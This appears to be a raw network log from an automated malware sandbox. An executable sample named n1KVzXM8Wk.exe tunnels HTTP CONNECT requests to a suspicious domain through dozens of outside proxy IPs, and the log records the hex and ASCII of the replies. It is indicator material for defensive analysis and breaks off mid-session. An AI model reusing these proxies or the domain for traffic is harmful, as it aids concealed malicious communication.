                                                                                                      Feb 23, 2024 09:45:20.704451084 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      463192.168.2.451489104.20.75.69806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.617588043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.705073118 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      464192.168.2.4513935.9.98.14230006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.632742882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      465192.168.2.4512953.37.125.7631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.640146971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.973434925 CET144INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: Express
                                                                                                      Server: squid/4.14
                                                                                                      Content-Length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      466192.168.2.451525172.67.25.204806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.642365932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.735295057 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      467192.168.2.45136693.126.56.3041536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.645734072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      468192.168.2.45126939.105.27.3031286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.650259018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.039572954 CET38INHTTP/1.1 200 OK
                                                                                                      content-length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      469192.168.2.451433141.94.174.616476812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.653789997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      470192.168.2.451565104.17.9.114806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.659492016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.746424913 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      471192.168.2.451362221.153.92.39806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.662637949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.943171978 CET310INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 150
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      472192.168.2.451336102.132.57.9080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.667972088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      473192.168.2.451252223.113.80.15890916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.672349930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.059962034 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:29 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      474192.168.2.45150850.63.12.3393676812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.677006006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.178180933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.681340933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.680813074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.680958986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.682894945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.680406094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.365952015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      475192.168.2.45148698.188.47.15041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.681366920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      476192.168.2.451559159.203.61.16931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.684851885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.088807106 CET28INHTTP/1.1 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      477192.168.2.450683167.172.159.43139886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.688322067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.829854012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      478192.168.2.45139194.20.183.172806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.700412035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      479192.168.2.451491213.136.78.200409276812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.701805115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      480192.168.2.45159092.204.134.38153936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.702327013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.037508965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.443850994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.099018097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.419401884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.740986109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.943994999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.443981886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.317179918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      481192.168.2.451575139.180.39.20580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.718707085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.907772064 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      482192.168.2.451316146.190.84.209261546812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.730190039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.586980104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.893233061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      483192.168.2.451552137.184.182.145156856812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.730192900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.334414005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.830513954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.893160105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.741055965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      484192.168.2.45156372.169.67.61876812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.735969067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      485192.168.2.45160323.227.38.230806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.736908913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.823961973 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      486192.168.2.451371103.165.37.24541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.743988037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      487192.168.2.45066139.107.33.25480906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.751684904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.056277990 CET343INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.10.3 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 182
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      488192.168.2.451588174.64.199.8241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.752463102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      489192.168.2.451586207.180.234.220489636812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.779975891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.365619898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.975122929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.178325891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.365941048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
